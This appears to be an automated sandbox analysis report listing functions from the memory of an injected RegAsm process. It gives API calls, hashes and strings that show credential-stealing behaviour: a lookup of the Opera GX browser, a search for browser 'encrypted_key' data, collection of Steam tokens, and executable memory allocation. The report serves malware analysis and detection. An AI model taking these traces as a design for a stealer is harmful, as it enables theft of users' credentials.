Opcode Fuzzy Hash: 40f9f930904c6f1e7f44892590f2669cf856bd0b95a420ad3cb379fce59b0549
Instruction Fuzzy Hash: F9018F71E00108ABCB20FB7699479CD37A56E04308F510177BC24E3293E7B8E9494AD9

Function 00416DAB Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416E12
CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: cdb10b8e60306c2fa4325ca73be3dda0d28feb2c12f9e0edb5fe627df89a9c4d
Instruction ID: ac34f07d689fe11239d5b498ca311f3d00f3767e701e506487528f20584d0130
Opcode Fuzzy Hash: cdb10b8e60306c2fa4325ca73be3dda0d28feb2c12f9e0edb5fe627df89a9c4d
Instruction Fuzzy Hash: 0E215776800208ABCF10EF56EC419DE7BB8EF44359F11412BF905A3151DB78AA86CFA8

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 332b17152576106e31bba7dfa95dd8c4a98366d3917a83033a17990dd8f5dc78
Instruction ID: 1dbce09a9baccc8d37ae59675b24394c6b26f9e4e5b381c126a67c3566460c23
Opcode Fuzzy Hash: 332b17152576106e31bba7dfa95dd8c4a98366d3917a83033a17990dd8f5dc78
Instruction Fuzzy Hash: 2BE08CB1200204BBD7449B99AC8DF8A76BCDB84751F000225B605D3290EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436842,00436837,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 5bef2b64dc765784e7567a3cf029b0bff576fd0450cc446496e8f564b3e4df0e
Instruction ID: 62232773154a303076264a3f64943b289574507c1c056ec7af7bda3d68d0c28a
Opcode Fuzzy Hash: 5bef2b64dc765784e7567a3cf029b0bff576fd0450cc446496e8f564b3e4df0e
Instruction Fuzzy Hash: ADB1EC7294011DABCF11FFA6DE436CD7775AF04308F51013AF904771A1DAB8AE8A8B99

Function 61E33F01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 61E33FB1

Strings

winRead, xrefs: 61E33FF4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 1dc9e4dacfb6df24b96d7bb42526614d83bcfb3ef7259d2b97fd230ce483df2a
Instruction ID: 86dfb52d516fc32fe72e852e1de4e79230a78ead2d6a4f464edf3a63d6cb504d
Opcode Fuzzy Hash: 1dc9e4dacfb6df24b96d7bb42526614d83bcfb3ef7259d2b97fd230ce483df2a
Instruction Fuzzy Hash: CE116D71908609ABDB20DF94C684BAAB7F4FB0434CF5444669641E32C0D77CBE85DB5A

Function 61E354D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB

Strings

HRa, xrefs: 61E3554C

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: InfoSystem
String ID: HRa
API String ID: 31276548-1004199025
Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93

Function 004160FA Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416142
lstrcatA.KERNEL32(?), ref: 00416160

Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415DE2
Part of subcall function 00415D9B: FindFirstFileA.KERNEL32(?,?), ref: 00415DF9
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00415E1A
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,00436AB8), ref: 00415E34
Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415E5B
Part of subcall function 00415D9B: StrCmpCA.SHLWAPI(?,0043661D), ref: 00415E6F
Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415E8C
Part of subcall function 00415D9B: PathMatchSpecA.SHLWAPI(?,?), ref: 00415EB9
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?), ref: 00415EEF
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,00436AD0), ref: 00415F01
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,?), ref: 00415F14
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,00436AD4), ref: 00415F26
Part of subcall function 00415D9B: lstrcatA.KERNEL32(?,?), ref: 00415F3A

Part of subcall function 00415D9B: wsprintfA.USER32 ref: 00415EA3
Part of subcall function 00415D9B: FindNextFileA.KERNEL32(?,?), ref: 004160C9
Part of subcall function 00415D9B: FindClose.KERNEL32(?), ref: 004160DD

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: f50a00a4f1833920348de6b632199413efc2fb0c0b578c7ad19f547fdd529ba6
Instruction ID: 2866533bdc9fa7f81945b845db37fb58c71720063629de90c2412f0a6052a1ea
Opcode Fuzzy Hash: f50a00a4f1833920348de6b632199413efc2fb0c0b578c7ad19f547fdd529ba6
Instruction Fuzzy Hash: 2331D37280030DAFDB01EB64DC43FE83B7AEB48305F5444EAB604A3261EE359A959F55

Function 00416ECB Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416F12

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00416F22

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 5932e701d13c86b375bba6bef497d202565cc792c44543e1ebf617e6d09a68fe
Instruction ID: 735c087a7e58790b6fb73fe6f7de2b320385be6d173ce1f100bf2c81b0e68d6d
Opcode Fuzzy Hash: 5932e701d13c86b375bba6bef497d202565cc792c44543e1ebf617e6d09a68fe
Instruction Fuzzy Hash: FF017531E001096BCF00FBE6DD478CD7B34AF44358F514176FA0073152DB78AA8A86D5

Function 00409549 Relevance: 2.8, APIs: 2, Instructions: 318stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409970
lstrlenA.KERNEL32(?), ref: 0040998B

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: ca10d1943021cf16f1f4049d2c3b314a16be519e9f47a675e7954045224a3533
Instruction ID: 5fb034dd1cc111e07199f24679e405206659f6c1298419ac274d26eaaccfca70
Opcode Fuzzy Hash: ca10d1943021cf16f1f4049d2c3b314a16be519e9f47a675e7954045224a3533
Instruction Fuzzy Hash: D0D10C71D00119AFCF11FBA6ED46ACDB775AF04308F51406AF510B71A1DBB86E8A8F98

Function 00408DDB Relevance: 2.7, APIs: 2, Instructions: 189stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00408FD4
lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 82f7be406c0fbac0bf840687c51b1e2783a9f7f6cefe49c8b160e95806d5074d
Instruction ID: f999e3fe9f99a7e0babdd765059f8c5cda68771fec2cfc7cf1e39f3607321a3c
Opcode Fuzzy Hash: 82f7be406c0fbac0bf840687c51b1e2783a9f7f6cefe49c8b160e95806d5074d
Instruction Fuzzy Hash: CA71EF72A401199FCF01FBA6DE465DD7775FF04309F51002AF500B71A1DBB8AE8A8B99

Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409209
lstrlenA.KERNEL32(?), ref: 00409224

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1616ed695c5fec432ece6a21947092b5ad5dfefb90b2776f687e9aba051b8463
Instruction ID: bb5f9b6a23767f737c4a5e3a7efe1fa83372ef7c10707d99fa9593649819e4c4
Opcode Fuzzy Hash: 1616ed695c5fec432ece6a21947092b5ad5dfefb90b2776f687e9aba051b8463
Instruction Fuzzy Hash: 6551FD71A001199FCF01FBA5EE469DE7775EF04309F510036F500B71A2DBB8AE5A8B99

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 062ec9ad209075061cac0a3245a2df55a7a9b1fd0e8693c1a057eab4c22c51e2
Instruction ID: be346e1b79507e5df651d3bcd3ea873ef27e6a0c1565e4ad84ac19951b72e85b
Opcode Fuzzy Hash: 062ec9ad209075061cac0a3245a2df55a7a9b1fd0e8693c1a057eab4c22c51e2
Instruction Fuzzy Hash: 6F11A272A04705AFC724CFB8C989BABB7E4EB40714F24496DE50AE7390D274B940C614

Function 0041CAB6 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CAC7

Part of subcall function 0041BA6A: lstrlenA.KERNEL32(?,0041CAD8,0041CB7A,00000000,06400000,00000003,00000000,00417493,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BA9C
Part of subcall function 0041BA6A: malloc.MSVCRT ref: 0041BAA4
Part of subcall function 0041BA6A: lstrcpyA.KERNEL32(00000000,?), ref: 0041BAAF

